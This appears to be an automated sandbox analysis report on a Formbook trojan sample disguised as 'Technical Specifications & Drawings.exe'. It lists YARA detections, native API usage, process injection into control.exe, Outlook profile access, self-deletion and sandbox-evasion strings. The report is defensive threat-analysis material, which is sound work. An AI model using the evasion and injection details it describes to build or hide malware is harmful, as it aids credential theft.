          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 5084, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: control.exe PID: 1896, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Technical Specifications & Drawings.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 5084, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 1896, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: String function: 017AB150 appears 133 times
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_017E9910
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E99A0 NtCreateSection,LdrInitializeThunk,4_2_017E99A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_017E9860
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9840 NtDelayExecution,LdrInitializeThunk,4_2_017E9840
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E98F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_017E98F0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A50 NtCreateFile,LdrInitializeThunk,4_2_017E9A50
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A20 NtResumeThread,LdrInitializeThunk,4_2_017E9A20
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_017E9A00
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9540 NtReadFile,LdrInitializeThunk,4_2_017E9540
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E95D0 NtClose,LdrInitializeThunk,4_2_017E95D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9710 NtQueryInformationToken,LdrInitializeThunk,4_2_017E9710
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9FE0 NtCreateMutant,LdrInitializeThunk,4_2_017E9FE0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E97A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_017E97A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9780 NtMapViewOfSection,LdrInitializeThunk,4_2_017E9780
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_017E9660
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_017E96E0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9950 NtQueueApcThread,4_2_017E9950
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E99D0 NtCreateProcessEx,4_2_017E99D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EB040 NtSuspendThread,4_2_017EB040
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9820 NtEnumerateKey,4_2_017E9820
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E98A0 NtWriteVirtualMemory,4_2_017E98A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9B00 NtSetValueKey,4_2_017E9B00
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EA3B0 NtGetContextThread,4_2_017EA3B0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A10 NtQuerySection,4_2_017E9A10
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9A80 NtOpenDirectoryObject,4_2_017E9A80
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9560 NtWriteFile,4_2_017E9560
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EAD30 NtSetContextThread,4_2_017EAD30
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9520 NtWaitForSingleObject,4_2_017E9520
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E95F0 NtQueryInformationFile,4_2_017E95F0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EA770 NtOpenThread,4_2_017EA770
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9770 NtSetInformationFile,4_2_017E9770
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9760 NtOpenProcess,4_2_017E9760
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9730 NtQueryVirtualMemory,4_2_017E9730
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017EA710 NtOpenProcessToken,4_2_017EA710
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9670 NtQueryInformationProcess,4_2_017E9670
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9650 NtQueryValueKey,4_2_017E9650
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9610 NtEnumerateValueKey,4_2_017E9610
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E96D0 NtCreateKey,4_2_017E96D0
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263993924.00000000029B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000000.238895450.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFileSh.exeB vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.276069305.00000000070C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.275768947.0000000006F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000004.00000003.261218393.0000000001562000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exe, 00000004.00000003.263343456.0000000001702000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exeBinary or memory string: OriginalFilenameFileSh.exeB vs Technical Specifications & Drawings.exe
          Source: Technical Specifications & Drawings.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Technical Specifications & Drawings.exeVirustotal: Detection: 32%
          Source: Technical Specifications & Drawings.exeReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe "C:\Users\user\Desktop\Technical Specifications & Drawings.exe"
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Technical Specifications & Drawings.exe.log
          Source: C:\Windows\SysWOW64\control.exe File created: C:\Users\user\AppData\Local\Temp\207G7-97P
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@14/6
          Source: Technical Specifications & Drawings.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: Technical Specifications & Drawings.exe, ProcExpGUI/Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.0.Technical Specifications & Drawings.exe.400000.0.unpack, ProcExpGUI/Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Technical Specifications & Drawings.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Technical Specifications & Drawings.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Technical Specifications & Drawings.exe, Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp

          Data Obfuscation

          Source: Technical Specifications & Drawings.exe, ProcExpGUI/Form1.cs.Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.Technical Specifications & Drawings.exe.400000.0.unpack, ProcExpGUI/Form1.cs.Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_028EEFEA pushad ; retf 0_2_028EEFF1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 0_2_028EF78A pushad ; iretd 0_2_028EF791
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017FD0D1 push ecx; ret 4_2_017FD0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.780783068719605

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\control.exe File deleted: c:\users\user\desktop\technical specifications & drawings.exe
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara matchFile source: 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTR
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe TID: 6116 Thread sleep time: -45877s >= -30000s
